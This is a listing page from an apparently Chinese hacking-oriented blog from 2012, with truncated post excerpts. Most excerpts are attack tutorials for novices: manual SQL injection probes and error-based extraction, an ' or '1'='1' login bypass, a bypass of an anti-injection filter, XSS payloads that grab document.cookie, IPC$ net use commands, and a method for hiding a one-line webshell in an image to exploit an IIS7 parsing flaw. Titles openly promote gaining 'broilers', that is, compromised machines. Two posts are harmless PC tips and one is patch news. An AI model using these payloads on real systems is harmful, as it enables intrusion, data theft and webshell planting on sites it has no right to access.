- 博客(15)
- 收藏
- 关注
RSS订阅原创 看视频防木马 360推送微软2012首批补丁
1月11日凌晨,微软发布2012年度首批7款安全补丁,用于修复Windows系统和软件的多处漏洞。目前,国内网民常用的360安全卫士已第一时间推送微软补丁,可以提升用户上网看视频、处理Office文档等日常操作的安全性,预防木马利用漏洞感染系统。 微软安全公告显示,本月7款补丁中有1款为“高危”级别,修复了Windows媒体播放组件的两处高危漏洞,其余6款补丁均为“重要”级别。360安全
2012-01-31 13:50:32
428
原创 %69d分析绕过防注入
枫叶防注入。看代码吧:Dim Fy_Url,Fy_a,Fy_x,Fy_Cs(),Fy_Cl,Fy_Ts,Fy_Zx Fy_Cl = 2 '处理方式:1=提示信息,2=转向页面,3=先提示再转向 Fy_Zx = "../" '出错时转向的页面 On Error Resume Next Fy_Url=Request.ServerVariables("QUERY_STRING")
2012-01-31 13:46:26
548
原创 快速学习,理解.SQL注入技术
检测可否注入http://127.0.0.1/xx?id=11 and 1=1 (正常页面)http://127.0.0.1/xx?id=11 and 1=2 (出错页面)检测表段的http://127.0.0.1/xx?id=11 and exists (select * from admin) 检测字段的http://127.0.0.1/xx?id=11 and ex
2012-01-31 13:44:46
525
原创 ' or '1'='1'等漏洞问题
漏洞描述: 在login.asp中,接收用户输入的Userid和Password数据,并分别赋值给user和pwd,然后再用sql="select * from admin where username="&user&" and password="&pwd&"" 这句来对用户名和密码加以验证。 以常理来考虑的话,这是个很完整的程序了。而在实际的使用过程中,整套程序也的确可能正常使用。
2012-01-31 13:44:00
4808
原创 菜鸟+Sa+注入工具组合=肉鸡成群
现在,注入漏洞异常火爆,不少黑友都利用该漏洞过了一把黑客瘾,并拥有了不少自己的肉鸡。不过对于小菜们来说,注入入侵也并不是那么一帆风顺,尤其是在注入点的寻找以及获得WebShell后的提升权限问题上。在这里,我给广大初学注入入侵的小菜们提供一种快速获取sa权限注入点入侵目标主机的办法。高手可以跳过本文,或者就当是复习吧。获取注入点的方法不外乎两种:手工寻找和利用注入工具寻找。对于前者,多数是用搜
2012-01-31 13:43:13
1679
原创 SQL注入--入侵动网
编辑前言:这个文章我没有测试,但前提条件还是很多,比如一定要有别的程序存在,而且也要用同一个SQLSERVER库,还得假设有注入漏洞。说到底和动网没有什么关系,但因为动网论坛的开放性,让人熟悉了其数据库结构,和程序运作方法。在一步步的攻击中取得管理权限,再一步步的提升权限,如果正好数据库用的是SA帐号,就更是麻烦了。正是由于这些条件的假设,所以大家也不用太紧张,这里提供的是很多理想状态下的
2012-01-31 13:42:08
1185
原创 Sql Server 手工注入总结(显错模式)
--显错模式总结,利用类型转换报错。--1=convert(int,(@@version))--1=convert(int,(select host_name()))--and 1=convert(int,(user))--爆表名记录条数。replace(字段名,' ','')select replace(str(count(*))+'N',' ','') from sys
2012-01-31 13:41:02
938
原创 PHP+MySQL环境下SQL Injection攻防总结
程序员们写代码的时候讲究TDD(测试驱动开发):在实现一个功能前,会先写一个测试用例,然后再编写代码使之运行通过。其实当黑客SQL Injection时,同样是一个TDD的过程:他们会先尝试着让程序报错,然后一点一点的修正参数内容,当程序再次运行成功之时,注入也就随之成功了。进攻:假设你的程序里有类似下面内容的脚本:$sql = "SELECT id, title, con
2012-01-31 13:39:50
1058
原创 XSS漏洞验证语句
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。相关测试代码,可供漏洞验证:>alert(document.cookie)=’>alert(document.cookie)alert(document.co
2012-01-31 13:39:09
3231
1
原创 手工注入之jsp篇
可能有人会说这个题目太假了,对,没错,是有点假,但是内容确实是本人整理的。希望可以给大家带来帮助。检测可否注入http://www.xxx.com /publics/detail.jsp?id=7674 and 1=1 (正常页面)http://www.xxx.com /publics/detail.jsp?id=7674 and 1=2 (出错页面)检测表段的
2012-01-31 13:38:19
471
原创 菜鸟必练入侵命令
1:NET 只要你拥有某IP的用户名和密码,那就用IPC$做连接吧! 这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为127.0.0.1 net use \\127.0.0.1\ipc$ "123456" /user:"hbx"退出的命令是 net use \\127.0.0.1\ipc$ /delte 下面的操作你必须登陆后才可以用.登陆的方法
2012-01-30 13:14:30
366
原创 新手操作电脑最忌讳的十八个动作
1、大力敲击回车键 这个恐怕是人所共有的通病了,因为回车键通常是我们完成一件事情时,最后要敲击的一个键,大概是出于一种胜利的兴奋感,每个人在输入这个回车键时总是那么大力而爽快地敲击。本人的多个键盘就是这样报废的,最先不看见字的是AWSD(呵呵,心知肚明),最先不能使用的按键却是Enter。 解决办法:解决方法有两个,第一是控制好你的情绪,第二是准备好你的钱包。我选的第二个
2012-01-30 13:10:21
865
原创 不可不看 WindowsXP系统宽带应用技巧
现在,使用ADSL、LAN等宽带方式高速上网的朋友是越来越多了,例如笔者所在的城市所提供的LAN方式宽带上网,不限时(但流量被限制为512KB)每月只需80元,真是不亦乐乎。如果你已经升级到WindowsXP操作环境,那么,下面这些宽带使用技巧不可不看哟: 1.查看宽带连接状态 只要从“开始/控制面板”下打开“拨号网络”窗口,就可以看到这里已经在“LAN或高速Internet连接”
2012-01-30 13:06:10
358
转载 通杀IIS7.0畸形解析0day漏洞
先合并一张PHP一句话图片马,合并方法:①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif②、用edjpgcom,进行图片和一句话木马的合并,图片随便找一张.【顺带着说一下edjpgcom的使用方法:打开edjpgcom.exe所在文件夹,然后把你所要修改的图片拖动到edjpgcom.exe上面,然后edjpgcom.exe会自动打开,写入想要些的代
2012-01-30 13:00:44
391
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人